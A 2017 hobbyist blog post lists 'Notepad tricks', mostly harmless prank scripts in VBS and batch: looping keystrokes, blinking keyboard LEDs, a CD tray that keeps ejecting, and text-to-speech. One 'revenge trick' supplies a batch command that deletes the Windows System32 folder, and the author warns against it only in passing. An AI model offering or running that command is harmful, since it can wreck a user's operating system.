Saturday, 4 March 2017

Amazing Notepad Tricks of 2017

  WaZiristani HaXor       Saturday, 4 March 2017
People think that notepad is a simple text editor which comes for free with windows and has nothing amazing about it. Most of them never explored Notepad enough. I am sharing few Best Notepad tricks which can give you pleasure. 

Notepad Tricks
Notepad Tricks

Here are few coolest notepad tricks 2017


Backspace button trick

You can use this trick to really annoy your siblings or a friend. Generally people think that keys only works when you press them but this can be done by writing a simple code in notepad and save it as a .vbs file.

Copy this code for backspace button notepad trick.

MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Notepad revenge trick

This notepad trick is not for normal use and kindly don’t use it on other to take revenge. Notepad can delete all system 32 files on any computer if you simply copy the code below and save file as a .bat file.
 
DEL C:\WINDOWS\SYSTEM32\*.*/Q

Matrix raining in Notepad

In matrix movie there is a scene in which strings of green codes went pass the screen. Have you ever wonder how they did it. You can do the same with a simple notepad trick. Open notepad and paste below mentioned code. Save it as Matrix.bat file. Open it to see the same effect as in

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start



Amazing Notepad Tricks of 2017




Led dance Notepad trick

There are always three lEDs on any keyboard (Numlock, scroll lock and caps lock). This below mention notepad trick will cause then turn on and off creating a rhythmic moment like dance. To do so, open notepad and copy below mentioned code. Save it as Dance.vbs. click the file all your all three lights will give you a dancing ovation.
 
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

 

CD drive Open close Notepad trick

 

This prank can be very useful to freak someone out. This will cause CD drive to open and close again and again which will create a bizarre and horrific scene if executed perfectly. To do this, open notepad file and enter below mentioned code. Save it as cdopen.vbs. Open it and you will see cd drive opening and closing continuously. You have to use task manager and stop cdopen.vbs operation to end this game.

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
 

Speaking Computer trick
You can paste this below mentioned code in notepad and save it as .vbs file. Whenever you open it a dialog box will appear which will ask you to write something in it. Write what you want to hear from your computer. The voice will also tell you about the gender of your computer.  
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

Personal Diary in notepad

Notepad can be used as a diary to note down events with time and date. This can be easily done by opening a notepad and type .LOG in caps letters. After saving it you can use it as a dairy. Notepad will add date and time whenever you opens it up to make it look like a diary.


Hope you use these tricks in best possible ways. Don’t forget to comment and share your experience. 

notepad tricks bat
notepad codes list
notepad tricks and hacks pdf      
notepad tricks matrix
notepad tricks vbs
notepad codes for games
notepad++ tricks
notepad codes html
logoblog

Thanks for reading Amazing Notepad Tricks of 2017

Previous
« Prev Post

No comments:

Post a Comment